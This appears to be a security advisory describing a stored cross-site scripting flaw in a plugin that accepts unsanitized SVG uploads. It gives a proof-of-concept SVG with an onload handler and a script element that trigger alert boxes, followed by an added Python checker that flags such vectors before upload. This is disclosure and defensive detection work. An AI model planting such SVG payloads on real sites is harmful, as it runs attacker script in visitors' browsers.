The plugin does not sanitize SVG file contents, leading to a Cross-Site Scripting vulnerability.
1. Upload an SVG file with the contents shown below.
2. View the SVG file on the frontend and see the alerts.
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg
   onload="javascript:alert(/XSS/)"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:cc="http://creativecommons.org/ns#"
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:svg="http://www.w3.org/2000/svg"
   xmlns="http://www.w3.org/2000/svg"
   xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
   xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
   id="svg3013"
   sodipodi:docname="download_font_awesome.svg">
  <script>alert(/XSS2/)</script>
</svg>
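
An added example, not part of the original advisory or the plugin's code: an upload-time check in Python that flags the two script vectors used in the file above (the `onload` handler and the `<script>` element) so such a file can be rejected before it is stored. The function name `svg_findings` and the sample inputs are assumptions constructed for illustration; this is a detection check, not a full sanitizer.

```python
import re
import xml.etree.ElementTree as ET

URL_ATTRS = {"href", "src"}            # compared after stripping any namespace
BLOCKED_TAGS = {"script", "foreignobject"}


def local(name):
    """Strip the '{namespace}' prefix ElementTree puts on qualified names."""
    return name.rsplit("}", 1)[-1].lower()


def svg_findings(data: bytes):
    """Return reasons the SVG must not be served inline; an empty list means none found."""
    # Refuse DTDs outright: images do not need them and they enable entity tricks.
    if re.search(rb"<!(DOCTYPE|ENTITY)", data, re.I):
        return ["doctype or entity declaration"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    for el in root.iter():
        tag = local(el.tag)
        if tag in BLOCKED_TAGS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = local(attr)
            if name.startswith("on"):          # onload, onclick, onerror, ...
                findings.append(f"event handler {name} on <{tag}>")
            # Drop whitespace and control characters browsers ignore in a URL scheme.
            compact = re.sub(r"[\s\x00-\x1f]+", "", value).lower()
            if name in URL_ATTRS and compact.startswith(("javascript:", "data:text/html")):
                findings.append(f"script URL in {name} on <{tag}>")
    return findings


# Constructed sample: the advisory's file reduced to its two active vectors.
POC = b"""<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg onload="javascript:alert(/XSS/)" xmlns="http://www.w3.org/2000/svg" id="svg3013">
<script>alert(/XSS2/)</script>
</svg>"""
# Constructed sample: a harmless image that should pass.
CLEAN = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="4"/></svg>'

if __name__ == "__main__":
    for label, blob in (("poc", POC), ("clean", CLEAN)):
        print(label, svg_findings(blob) or "no findings")
```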